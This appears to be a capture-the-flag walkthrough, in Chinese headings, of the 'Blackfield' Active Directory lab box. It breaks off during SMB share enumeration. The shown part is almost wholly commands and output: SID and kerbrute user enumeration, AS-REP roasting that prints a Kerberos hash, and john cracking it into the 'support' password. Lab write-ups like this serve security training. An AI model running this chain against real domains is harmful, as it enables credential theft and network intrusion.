RKrnjaic
RNemnich
RPoretsky
RStuehringer
RSzewczuga
RVallandas
RWeatherl
RWissor
SAbdulagatov
SAjowi
SAlguwaihes
SBonaparte
SBouzane
SChatin
SDellabitta
SDhodapkar
SEulert
SFadrigalan
SGolds
SGrifasi
SGtlinas
SHauht
SHederian
SHelregel
SKrulig
SLewrie
SMaskil
Smocker
SMoyta
SRaustiala
SReppond
SSicliano
SSilex
SSolsbak
STousignaut
support
svc_backup
SWhyte
SWynigear
TAwaysheh
TBadenbach
TCaffo
TCassalom
TEiselt
TFerencdo
TGaleazza
TKauten
TKnupke
TLintlop
TMusselli
TOust
TSlupka
TStausland
TZumpella
UCrofskey
UMarylebone
UPyrke
VBublavy
VButziger
VFuscca
VLitschauer
VMamchuk
VMarija
VOlaosun
VPapalouca
WSaldat
WVerzhbytska
WZelazny
XBemelen
XDadant
XDebes
XKonegni
XRykiel
YBleasdale
YHuftalin
YKivlen
YKozlicki
YNyirenda
YPredestin
YSeturino
YSkoropada
YVonebers
YZarpentine
ZAlatti
ZKrenselewski
ZMalaab
ZMiick
ZScozzari
ZTimofeeff
ZWausik

lookupsid枚举域用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-lookupsid anonymous@10.129.229.17
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Brute forcing SIDs at 10.129.229.17
[*] StringBinding ncacn_np:10.129.229.17[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4194615774-2175524697-3563712290
498: BLACKFIELD\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: BLACKFIELD\Administrator (SidTypeUser)
501: BLACKFIELD\Guest (SidTypeUser)
502: BLACKFIELD\krbtgt (SidTypeUser)
512: BLACKFIELD\Domain Admins (SidTypeGroup)
513: BLACKFIELD\Domain Users (SidTypeGroup)
514: BLACKFIELD\Domain Guests (SidTypeGroup)
515: BLACKFIELD\Domain Computers (SidTypeGroup)
516: BLACKFIELD\Domain Controllers (SidTypeGroup)
517: BLACKFIELD\Cert Publishers (SidTypeAlias)
518: BLACKFIELD\Schema Admins (SidTypeGroup)
519: BLACKFIELD\Enterprise Admins (SidTypeGroup)
520: BLACKFIELD\Group Policy Creator Owners (SidTypeGroup)
521: BLACKFIELD\Read-only Domain Controllers (SidTypeGroup)
522: BLACKFIELD\Cloneable Domain Controllers (SidTypeGroup)
525: BLACKFIELD\Protected Users (SidTypeGroup)
526: BLACKFIELD\Key Admins (SidTypeGroup)
527: BLACKFIELD\Enterprise Key Admins (SidTypeGroup)
553: BLACKFIELD\RAS and IAS Servers (SidTypeAlias)
571: BLACKFIELD\Allowed RODC Password Replication Group (SidTypeAlias)
572: BLACKFIELD\Denied RODC Password Replication Group (SidTypeAlias)
1000: BLACKFIELD\DC01$ (SidTypeUser)
1101: BLACKFIELD\DnsAdmins (SidTypeAlias)
1102: BLACKFIELD\DnsUpdateProxy (SidTypeGroup)
1103: BLACKFIELD\audit2020 (SidTypeUser)
1104: BLACKFIELD\support (SidTypeUser)
1105: BLACKFIELD\BLACKFIELD764430 (SidTypeUser)
1106: BLACKFIELD\BLACKFIELD538365 (SidTypeUser)
1107: BLACKFIELD\BLACKFIELD189208 (SidTypeUser)
1108: BLACKFIELD\BLACKFIELD404458 (SidTypeUser)
1109: BLACKFIELD\BLACKFIELD706381 (SidTypeUser)
1110: BLACKFIELD\BLACKFIELD937395 (SidTypeUser)
1111: BLACKFIELD\BLACKFIELD553715 (SidTypeUser)
1112: BLACKFIELD\BLACKFIELD840481 (SidTypeUser)
1113: BLACKFIELD\BLACKFIELD622501 (SidTypeUser)
1114: BLACKFIELD\BLACKFIELD787464 (SidTypeUser)
1115: BLACKFIELD\BLACKFIELD163183 (SidTypeUser)
1116: BLACKFIELD\BLACKFIELD869335 (SidTypeUser)
1117: BLACKFIELD\BLACKFIELD319016 (SidTypeUser)
1118: BLACKFIELD\BLACKFIELD600999 (SidTypeUser)
1119: BLACKFIELD\BLACKFIELD894905 (SidTypeUser)
1120: BLACKFIELD\BLACKFIELD253541 (SidTypeUser)
1121: BLACKFIELD\BLACKFIELD175204 (SidTypeUser)
1122: BLACKFIELD\BLACKFIELD727512 (SidTypeUser)
1123: BLACKFIELD\BLACKFIELD227380 (SidTypeUser)
1124: BLACKFIELD\BLACKFIELD251003 (SidTypeUser)
1125: BLACKFIELD\BLACKFIELD129328 (SidTypeUser)
1126: BLACKFIELD\BLACKFIELD616527 (SidTypeUser)
1127: BLACKFIELD\BLACKFIELD533551 (SidTypeUser)
1128: BLACKFIELD\BLACKFIELD883784 (SidTypeUser)
1129: BLACKFIELD\BLACKFIELD908329 (SidTypeUser)
1130: BLACKFIELD\BLACKFIELD601590 (SidTypeUser)
1131: BLACKFIELD\BLACKFIELD573498 (SidTypeUser)
1132: BLACKFIELD\BLACKFIELD290325 (SidTypeUser)
1133: BLACKFIELD\BLACKFIELD775986 (SidTypeUser)
1134: BLACKFIELD\BLACKFIELD348433 (SidTypeUser)
1135: BLACKFIELD\BLACKFIELD196444 (SidTypeUser)
1136: BLACKFIELD\BLACKFIELD137694 (SidTypeUser)
1137: BLACKFIELD\BLACKFIELD533886 (SidTypeUser)
1138: BLACKFIELD\BLACKFIELD268320 (SidTypeUser)
1139: BLACKFIELD\BLACKFIELD909590 (SidTypeUser)
1140: BLACKFIELD\BLACKFIELD136813 (SidTypeUser)
1141: BLACKFIELD\BLACKFIELD358090 (SidTypeUser)
1142: BLACKFIELD\BLACKFIELD561870 (SidTypeUser)
1143: BLACKFIELD\BLACKFIELD269538 (SidTypeUser)
1144: BLACKFIELD\BLACKFIELD169035 (SidTypeUser)
1145: BLACKFIELD\BLACKFIELD118321 (SidTypeUser)
1146: BLACKFIELD\BLACKFIELD592556 (SidTypeUser)
1147: BLACKFIELD\BLACKFIELD618519 (SidTypeUser)
1148: BLACKFIELD\BLACKFIELD329802 (SidTypeUser)
1149: BLACKFIELD\BLACKFIELD753480 (SidTypeUser)
1150: BLACKFIELD\BLACKFIELD837541 (SidTypeUser)
1151: BLACKFIELD\BLACKFIELD186980 (SidTypeUser)
1152: BLACKFIELD\BLACKFIELD419600 (SidTypeUser)
1153: BLACKFIELD\BLACKFIELD220786 (SidTypeUser)
1154: BLACKFIELD\BLACKFIELD767820 (SidTypeUser)
1155: BLACKFIELD\BLACKFIELD549571 (SidTypeUser)
1156: BLACKFIELD\BLACKFIELD411740 (SidTypeUser)
1157: BLACKFIELD\BLACKFIELD768095 (SidTypeUser)
1158: BLACKFIELD\BLACKFIELD835725 (SidTypeUser)
1159: BLACKFIELD\BLACKFIELD251977 (SidTypeUser)
1160: BLACKFIELD\BLACKFIELD430864 (SidTypeUser)
1161: BLACKFIELD\BLACKFIELD413242 (SidTypeUser)
1162: BLACKFIELD\BLACKFIELD464763 (SidTypeUser)
1163: BLACKFIELD\BLACKFIELD266096 (SidTypeUser)
1164: BLACKFIELD\BLACKFIELD334058 (SidTypeUser)
1165: BLACKFIELD\BLACKFIELD404213 (SidTypeUser)
1166: BLACKFIELD\BLACKFIELD219324 (SidTypeUser)
1167: BLACKFIELD\BLACKFIELD412798 (SidTypeUser)
1168: BLACKFIELD\BLACKFIELD441593 (SidTypeUser)
1169: BLACKFIELD\BLACKFIELD606328 (SidTypeUser)
1170: BLACKFIELD\BLACKFIELD796301 (SidTypeUser)
1171: BLACKFIELD\BLACKFIELD415829 (SidTypeUser)
1172: BLACKFIELD\BLACKFIELD820995 (SidTypeUser)
1173: BLACKFIELD\BLACKFIELD695166 (SidTypeUser)
1174: BLACKFIELD\BLACKFIELD759042 (SidTypeUser)
1175: BLACKFIELD\BLACKFIELD607290 (SidTypeUser)
1176: BLACKFIELD\BLACKFIELD229506 (SidTypeUser)
1177: BLACKFIELD\BLACKFIELD256791 (SidTypeUser)
1178: BLACKFIELD\BLACKFIELD997545 (SidTypeUser)
1179: BLACKFIELD\BLACKFIELD114762 (SidTypeUser)
1180: BLACKFIELD\BLACKFIELD321206 (SidTypeUser)
1181: BLACKFIELD\BLACKFIELD195757 (SidTypeUser)
1182: BLACKFIELD\BLACKFIELD877328 (SidTypeUser)
1183: BLACKFIELD\BLACKFIELD446463 (SidTypeUser)
1184: BLACKFIELD\BLACKFIELD579980 (SidTypeUser)
1185: BLACKFIELD\BLACKFIELD775126 (SidTypeUser)
1186: BLACKFIELD\BLACKFIELD429587 (SidTypeUser)
1187: BLACKFIELD\BLACKFIELD534956 (SidTypeUser)
1188: BLACKFIELD\BLACKFIELD315276 (SidTypeUser)
1189: BLACKFIELD\BLACKFIELD995218 (SidTypeUser)
1190: BLACKFIELD\BLACKFIELD843883 (SidTypeUser)
1191: BLACKFIELD\BLACKFIELD876916 (SidTypeUser)
1192: BLACKFIELD\BLACKFIELD382769 (SidTypeUser)
1193: BLACKFIELD\BLACKFIELD194732 (SidTypeUser)
1194: BLACKFIELD\BLACKFIELD191416 (SidTypeUser)
1195: BLACKFIELD\BLACKFIELD932709 (SidTypeUser)
1196: BLACKFIELD\BLACKFIELD546640 (SidTypeUser)
1197: BLACKFIELD\BLACKFIELD569313 (SidTypeUser)
1198: BLACKFIELD\BLACKFIELD744790 (SidTypeUser)
1199: BLACKFIELD\BLACKFIELD739659 (SidTypeUser)
1200: BLACKFIELD\BLACKFIELD926559 (SidTypeUser)
1201: BLACKFIELD\BLACKFIELD969352 (SidTypeUser)
1202: BLACKFIELD\BLACKFIELD253047 (SidTypeUser)
1203: BLACKFIELD\BLACKFIELD899433 (SidTypeUser)
1204: BLACKFIELD\BLACKFIELD606964 (SidTypeUser)
1205: BLACKFIELD\BLACKFIELD385719 (SidTypeUser)
1206: BLACKFIELD\BLACKFIELD838710 (SidTypeUser)
1207: BLACKFIELD\BLACKFIELD608914 (SidTypeUser)
1208: BLACKFIELD\BLACKFIELD569653 (SidTypeUser)
1209: BLACKFIELD\BLACKFIELD759079 (SidTypeUser)
1210: BLACKFIELD\BLACKFIELD488531 (SidTypeUser)
1211: BLACKFIELD\BLACKFIELD160610 (SidTypeUser)
1212: BLACKFIELD\BLACKFIELD586934 (SidTypeUser)
1213: BLACKFIELD\BLACKFIELD819822 (SidTypeUser)
1214: BLACKFIELD\BLACKFIELD739765 (SidTypeUser)
1215: BLACKFIELD\BLACKFIELD875008 (SidTypeUser)
1216: BLACKFIELD\BLACKFIELD441759 (SidTypeUser)
1217: BLACKFIELD\BLACKFIELD763893 (SidTypeUser)
1218: BLACKFIELD\BLACKFIELD713470 (SidTypeUser)
1219: BLACKFIELD\BLACKFIELD131771 (SidTypeUser)
1220: BLACKFIELD\BLACKFIELD793029 (SidTypeUser)
1221: BLACKFIELD\BLACKFIELD694429 (SidTypeUser)
1222: BLACKFIELD\BLACKFIELD802251 (SidTypeUser)
1223: BLACKFIELD\BLACKFIELD602567 (SidTypeUser)
1224: BLACKFIELD\BLACKFIELD328983 (SidTypeUser)
1225: BLACKFIELD\BLACKFIELD990638 (SidTypeUser)
1226: BLACKFIELD\BLACKFIELD350809 (SidTypeUser)
1227: BLACKFIELD\BLACKFIELD405242 (SidTypeUser)
1228: BLACKFIELD\BLACKFIELD267457 (SidTypeUser)
1229: BLACKFIELD\BLACKFIELD686428 (SidTypeUser)
1230: BLACKFIELD\BLACKFIELD478828 (SidTypeUser)
1231: BLACKFIELD\BLACKFIELD129387 (SidTypeUser)
1232: BLACKFIELD\BLACKFIELD544934 (SidTypeUser)
1233: BLACKFIELD\BLACKFIELD115148 (SidTypeUser)
1234: BLACKFIELD\BLACKFIELD753537 (SidTypeUser)
1235: BLACKFIELD\BLACKFIELD416532 (SidTypeUser)
1236: BLACKFIELD\BLACKFIELD680939 (SidTypeUser)
1237: BLACKFIELD\BLACKFIELD732035 (SidTypeUser)
1238: BLACKFIELD\BLACKFIELD522135 (SidTypeUser)
1239: BLACKFIELD\BLACKFIELD773423 (SidTypeUser)
1240: BLACKFIELD\BLACKFIELD371669 (SidTypeUser)
1241: BLACKFIELD\BLACKFIELD252379 (SidTypeUser)
1242: BLACKFIELD\BLACKFIELD828826 (SidTypeUser)
1243: BLACKFIELD\BLACKFIELD548394 (SidTypeUser)
1244: BLACKFIELD\BLACKFIELD611993 (SidTypeUser)
1245: BLACKFIELD\BLACKFIELD192642 (SidTypeUser)
1246: BLACKFIELD\BLACKFIELD106360 (SidTypeUser)
1247: BLACKFIELD\BLACKFIELD939243 (SidTypeUser)
1248: BLACKFIELD\BLACKFIELD230515 (SidTypeUser)
1249: BLACKFIELD\BLACKFIELD774376 (SidTypeUser)
1250: BLACKFIELD\BLACKFIELD576233 (SidTypeUser)
1251: BLACKFIELD\BLACKFIELD676303 (SidTypeUser)
1252: BLACKFIELD\BLACKFIELD673073 (SidTypeUser)
1253: BLACKFIELD\BLACKFIELD558867 (SidTypeUser)
1254: BLACKFIELD\BLACKFIELD184482 (SidTypeUser)
1255: BLACKFIELD\BLACKFIELD724669 (SidTypeUser)
1256: BLACKFIELD\BLACKFIELD765350 (SidTypeUser)
1257: BLACKFIELD\BLACKFIELD411132 (SidTypeUser)
1258: BLACKFIELD\BLACKFIELD128775 (SidTypeUser)
1259: BLACKFIELD\BLACKFIELD704154 (SidTypeUser)
1260: BLACKFIELD\BLACKFIELD107197 (SidTypeUser)
1261: BLACKFIELD\BLACKFIELD994577 (SidTypeUser)
1262: BLACKFIELD\BLACKFIELD683323 (SidTypeUser)
1263: BLACKFIELD\BLACKFIELD433476 (SidTypeUser)
1264: BLACKFIELD\BLACKFIELD644281 (SidTypeUser)
1265: BLACKFIELD\BLACKFIELD195953 (SidTypeUser)
1266: BLACKFIELD\BLACKFIELD868068 (SidTypeUser)
1267: BLACKFIELD\BLACKFIELD690642 (SidTypeUser)
1268: BLACKFIELD\BLACKFIELD465267 (SidTypeUser)
1269: BLACKFIELD\BLACKFIELD199889 (SidTypeUser)
1270: BLACKFIELD\BLACKFIELD468839 (SidTypeUser)
1271: BLACKFIELD\BLACKFIELD348835 (SidTypeUser)
1272: BLACKFIELD\BLACKFIELD624385 (SidTypeUser)
1273: BLACKFIELD\BLACKFIELD818863 (SidTypeUser)
1274: BLACKFIELD\BLACKFIELD939200 (SidTypeUser)
1275: BLACKFIELD\BLACKFIELD135990 (SidTypeUser)
1276: BLACKFIELD\BLACKFIELD484290 (SidTypeUser)
1277: BLACKFIELD\BLACKFIELD898237 (SidTypeUser)
1278: BLACKFIELD\BLACKFIELD773118 (SidTypeUser)
1279: BLACKFIELD\BLACKFIELD148067 (SidTypeUser)
1280: BLACKFIELD\BLACKFIELD390179 (SidTypeUser)
1281: BLACKFIELD\BLACKFIELD359278 (SidTypeUser)
1282: BLACKFIELD\BLACKFIELD375924 (SidTypeUser)
1283: BLACKFIELD\BLACKFIELD533060 (SidTypeUser)
1284: BLACKFIELD\BLACKFIELD534196 (SidTypeUser)
1285: BLACKFIELD\BLACKFIELD639103 (SidTypeUser)
1286: BLACKFIELD\BLACKFIELD933887 (SidTypeUser)
1287: BLACKFIELD\BLACKFIELD907614 (SidTypeUser)
1288: BLACKFIELD\BLACKFIELD991588 (SidTypeUser)
1289: BLACKFIELD\BLACKFIELD781404 (SidTypeUser)
1290: BLACKFIELD\BLACKFIELD787995 (SidTypeUser)
1291: BLACKFIELD\BLACKFIELD911926 (SidTypeUser)
1292: BLACKFIELD\BLACKFIELD146200 (SidTypeUser)
1293: BLACKFIELD\BLACKFIELD826622 (SidTypeUser)
1294: BLACKFIELD\BLACKFIELD171624 (SidTypeUser)
1295: BLACKFIELD\BLACKFIELD497216 (SidTypeUser)
1296: BLACKFIELD\BLACKFIELD839613 (SidTypeUser)
1297: BLACKFIELD\BLACKFIELD428532 (SidTypeUser)
1298: BLACKFIELD\BLACKFIELD697473 (SidTypeUser)
1299: BLACKFIELD\BLACKFIELD291678 (SidTypeUser)
1300: BLACKFIELD\BLACKFIELD623122 (SidTypeUser)
1301: BLACKFIELD\BLACKFIELD765982 (SidTypeUser)
1302: BLACKFIELD\BLACKFIELD701303 (SidTypeUser)
1303: BLACKFIELD\BLACKFIELD250576 (SidTypeUser)
1304: BLACKFIELD\BLACKFIELD971417 (SidTypeUser)
1305: BLACKFIELD\BLACKFIELD160820 (SidTypeUser)
1306: BLACKFIELD\BLACKFIELD385928 (SidTypeUser)
1307: BLACKFIELD\BLACKFIELD848660 (SidTypeUser)
1308: BLACKFIELD\BLACKFIELD682842 (SidTypeUser)
1309: BLACKFIELD\BLACKFIELD813266 (SidTypeUser)
1310: BLACKFIELD\BLACKFIELD274577 (SidTypeUser)
1311: BLACKFIELD\BLACKFIELD448641 (SidTypeUser)
1312: BLACKFIELD\BLACKFIELD318077 (SidTypeUser)
1313: BLACKFIELD\BLACKFIELD289513 (SidTypeUser)
1314: BLACKFIELD\BLACKFIELD336573 (SidTypeUser)
1315: BLACKFIELD\BLACKFIELD962495 (SidTypeUser)
1316: BLACKFIELD\BLACKFIELD566117 (SidTypeUser)
1317: BLACKFIELD\BLACKFIELD617630 (SidTypeUser)
1318: BLACKFIELD\BLACKFIELD717683 (SidTypeUser)
1319: BLACKFIELD\BLACKFIELD390192 (SidTypeUser)
1320: BLACKFIELD\BLACKFIELD652779 (SidTypeUser)
1321: BLACKFIELD\BLACKFIELD665997 (SidTypeUser)
1322: BLACKFIELD\BLACKFIELD998321 (SidTypeUser)
1323: BLACKFIELD\BLACKFIELD946509 (SidTypeUser)
1324: BLACKFIELD\BLACKFIELD228442 (SidTypeUser)
1325: BLACKFIELD\BLACKFIELD548464 (SidTypeUser)
1326: BLACKFIELD\BLACKFIELD586592 (SidTypeUser)
1327: BLACKFIELD\BLACKFIELD512331 (SidTypeUser)
1328: BLACKFIELD\BLACKFIELD609423 (SidTypeUser)
1329: BLACKFIELD\BLACKFIELD395725 (SidTypeUser)
1330: BLACKFIELD\BLACKFIELD438923 (SidTypeUser)
1331: BLACKFIELD\BLACKFIELD691480 (SidTypeUser)
1332: BLACKFIELD\BLACKFIELD236467 (SidTypeUser)
1333: BLACKFIELD\BLACKFIELD895235 (SidTypeUser)
1334: BLACKFIELD\BLACKFIELD788523 (SidTypeUser)
1335: BLACKFIELD\BLACKFIELD710285 (SidTypeUser)
1336: BLACKFIELD\BLACKFIELD357023 (SidTypeUser)
1337: BLACKFIELD\BLACKFIELD362337 (SidTypeUser)
1338: BLACKFIELD\BLACKFIELD651599 (SidTypeUser)
1339: BLACKFIELD\BLACKFIELD579344 (SidTypeUser)
1340: BLACKFIELD\BLACKFIELD859776 (SidTypeUser)
1341: BLACKFIELD\BLACKFIELD789969 (SidTypeUser)
1342: BLACKFIELD\BLACKFIELD356727 (SidTypeUser)
1343: BLACKFIELD\BLACKFIELD962999 (SidTypeUser)
1344: BLACKFIELD\BLACKFIELD201655 (SidTypeUser)
1345: BLACKFIELD\BLACKFIELD635996 (SidTypeUser)
1346: BLACKFIELD\BLACKFIELD478410 (SidTypeUser)
1347: BLACKFIELD\BLACKFIELD518316 (SidTypeUser)
1348: BLACKFIELD\BLACKFIELD202900 (SidTypeUser)
1349: BLACKFIELD\BLACKFIELD767498 (SidTypeUser)
1350: BLACKFIELD\BLACKFIELD103974 (SidTypeUser)
1351: BLACKFIELD\BLACKFIELD135403 (SidTypeUser)
1352: BLACKFIELD\BLACKFIELD112766 (SidTypeUser)
1353: BLACKFIELD\BLACKFIELD978938 (SidTypeUser)
1354: BLACKFIELD\BLACKFIELD871753 (SidTypeUser)
1355: BLACKFIELD\BLACKFIELD136203 (SidTypeUser)
1356: BLACKFIELD\BLACKFIELD634593 (SidTypeUser)
1357: BLACKFIELD\BLACKFIELD274367 (SidTypeUser)
1358: BLACKFIELD\BLACKFIELD520852 (SidTypeUser)
1359: BLACKFIELD\BLACKFIELD339143 (SidTypeUser)
1360: BLACKFIELD\BLACKFIELD684814 (SidTypeUser)
1361: BLACKFIELD\BLACKFIELD792484 (SidTypeUser)
1362: BLACKFIELD\BLACKFIELD802875 (SidTypeUser)
1363: BLACKFIELD\BLACKFIELD383108 (SidTypeUser)
1364: BLACKFIELD\BLACKFIELD318250 (SidTypeUser)
1365: BLACKFIELD\BLACKFIELD496547 (SidTypeUser)
1366: BLACKFIELD\BLACKFIELD219914 (SidTypeUser)
1367: BLACKFIELD\BLACKFIELD454313 (SidTypeUser)
1368: BLACKFIELD\BLACKFIELD460131 (SidTypeUser)
1369: BLACKFIELD\BLACKFIELD613771 (SidTypeUser)
1370: BLACKFIELD\BLACKFIELD632329 (SidTypeUser)
1371: BLACKFIELD\BLACKFIELD402639 (SidTypeUser)
1372: BLACKFIELD\BLACKFIELD235930 (SidTypeUser)
1373: BLACKFIELD\BLACKFIELD246388 (SidTypeUser)
1374: BLACKFIELD\BLACKFIELD946435 (SidTypeUser)
1375: BLACKFIELD\BLACKFIELD739227 (SidTypeUser)
1376: BLACKFIELD\BLACKFIELD827906 (SidTypeUser)
1377: BLACKFIELD\BLACKFIELD198927 (SidTypeUser)
1378: BLACKFIELD\BLACKFIELD169876 (SidTypeUser)
1379: BLACKFIELD\BLACKFIELD150357 (SidTypeUser)
1380: BLACKFIELD\BLACKFIELD594619 (SidTypeUser)
1381: BLACKFIELD\BLACKFIELD274109 (SidTypeUser)
1382: BLACKFIELD\BLACKFIELD682949 (SidTypeUser)
1383: BLACKFIELD\BLACKFIELD316850 (SidTypeUser)
1384: BLACKFIELD\BLACKFIELD884808 (SidTypeUser)
1385: BLACKFIELD\BLACKFIELD327610 (SidTypeUser)
1386: BLACKFIELD\BLACKFIELD899238 (SidTypeUser)
1387: BLACKFIELD\BLACKFIELD184493 (SidTypeUser)
1388: BLACKFIELD\BLACKFIELD631162 (SidTypeUser)
1389: BLACKFIELD\BLACKFIELD591846 (SidTypeUser)
1390: BLACKFIELD\BLACKFIELD896715 (SidTypeUser)
1391: BLACKFIELD\BLACKFIELD500073 (SidTypeUser)
1392: BLACKFIELD\BLACKFIELD584113 (SidTypeUser)
1393: BLACKFIELD\BLACKFIELD204805 (SidTypeUser)
1394: BLACKFIELD\BLACKFIELD842593 (SidTypeUser)
1395: BLACKFIELD\BLACKFIELD397679 (SidTypeUser)
1396: BLACKFIELD\BLACKFIELD842438 (SidTypeUser)
1397: BLACKFIELD\BLACKFIELD286615 (SidTypeUser)
1398: BLACKFIELD\BLACKFIELD224839 (SidTypeUser)
1399: BLACKFIELD\BLACKFIELD631599 (SidTypeUser)
1400: BLACKFIELD\BLACKFIELD247450 (SidTypeUser)
1401: BLACKFIELD\BLACKFIELD290582 (SidTypeUser)
1402: BLACKFIELD\BLACKFIELD657263 (SidTypeUser)
1403: BLACKFIELD\BLACKFIELD314351 (SidTypeUser)
1404: BLACKFIELD\BLACKFIELD434395 (SidTypeUser)
1405: BLACKFIELD\BLACKFIELD410243 (SidTypeUser)
1406: BLACKFIELD\BLACKFIELD307633 (SidTypeUser)
1407: BLACKFIELD\BLACKFIELD758945 (SidTypeUser)
1408: BLACKFIELD\BLACKFIELD541148 (SidTypeUser)
1409: BLACKFIELD\BLACKFIELD532412 (SidTypeUser)
1410: BLACKFIELD\BLACKFIELD996878 (SidTypeUser)
1411: BLACKFIELD\BLACKFIELD653097 (SidTypeUser)
1412: BLACKFIELD\BLACKFIELD438814 (SidTypeUser)
1413: BLACKFIELD\svc_backup (SidTypeUser)
1414: BLACKFIELD\lydericlefebvre (SidTypeUser)
1415: BLACKFIELD\PC01$ (SidTypeUser)
1416: BLACKFIELD\PC02$ (SidTypeUser)
1417: BLACKFIELD\PC03$ (SidTypeUser)
1418: BLACKFIELD\PC04$ (SidTypeUser)
1419: BLACKFIELD\PC05$ (SidTypeUser)
1420: BLACKFIELD\PC06$ (SidTypeUser)
1421: BLACKFIELD\PC07$ (SidTypeUser)
1422: BLACKFIELD\PC08$ (SidTypeUser)
1423: BLACKFIELD\PC09$ (SidTypeUser)
1424: BLACKFIELD\PC10$ (SidTypeUser)
1425: BLACKFIELD\PC11$ (SidTypeUser)
1426: BLACKFIELD\PC12$ (SidTypeUser)
1427: BLACKFIELD\PC13$ (SidTypeUser)
1428: BLACKFIELD\SRV-WEB$ (SidTypeUser)
1429: BLACKFIELD\SRV-FILE$ (SidTypeUser)
1430: BLACKFIELD\SRV-EXCHANGE$ (SidTypeUser)
1431: BLACKFIELD\SRV-INTRANET$ (SidTypeUser)

kerbrute爆破用户名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./kerbrute_linux_amd64 userenum --dc 10.129.229.17 -d BLACKFIELD.local users.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/22/26 - Ronnie Flathers @ropnop

2026/06/22 01:51:29 >  Using KDC(s):
2026/06/22 01:51:29 >  	10.129.229.17:88

2026/06/22 01:51:51 >  [+] VALID USERNAME:	 audit2020@BLACKFIELD.local
2026/06/22 01:53:50 >  [+] VALID USERNAME:	 support@BLACKFIELD.local
2026/06/22 01:53:55 >  [+] VALID USERNAME:	 svc_backup@BLACKFIELD.local
2026/06/22 01:54:22 >  Done! Tested 314 usernames (3 valid) in 172.957 seconds

AS-REP Roasting攻击

1
2
3
4
5
6
7
8
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-GetNPUsers -usersfile users.txt -no-pass -dc-ip 10.129.229.17 BLACKFIELD.local/  
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:04643310da06a76f4ddc689721e9626d$4746c7eba7e64fc814a81f4ad22fc66a9374cb8dcb7a30e79401ea36e1fe9b2b61fbeeb078ce2fcfc6e47b986f96cadeb72351eab684cb1e87d11025c106ad519442f817d0e34170e352eef68c79293cdd998554ec01afcbd6910712a079028e5865268f6c39531730d8b175fb76b82cec13398078dba823d320992241a768e60329e4fd710882032ba747a8c1f0db04103a0f9c343fc6c2a34354feb8e601f3050035c5b4748cff59abba4ff615b5b19f6c0670e72565a3f2ff680e98667f0660d518a75fcf07e60466a85892fcbb469bb20edec2fa9114febefb6aaefc08cd33f811f063e77ea8d5d66baa045f05113186e3ec
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set

john破解哈希

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# john hash.txt --wordlist=rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD.LOCAL)     
1g 0:00:00:10 DONE (2026-06-22 01:59) 0.09784g/s 1402Kp/s 1402Kc/s 1402KC/s #1WIF3Y..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

得到凭据support:#00^BlackKnight

使用此凭据探测smb共享和用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'support' -p '#00^BlackKnight'
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
                                                                                                                                                                                                                                     
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nxc smb 10.129.229.17 -u 'support' -p '#00^BlackKnight' --shares
SMB         10.129.229.17   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.229.17   445    DC01             [+] BLACKFIELD.local\support:#00^BlackKnight 
SMB         10.129.229.17   445    DC01             [*] Enumerated shares
SMB         10.129.229.17   445    DC01             Share           Permissions     Remark
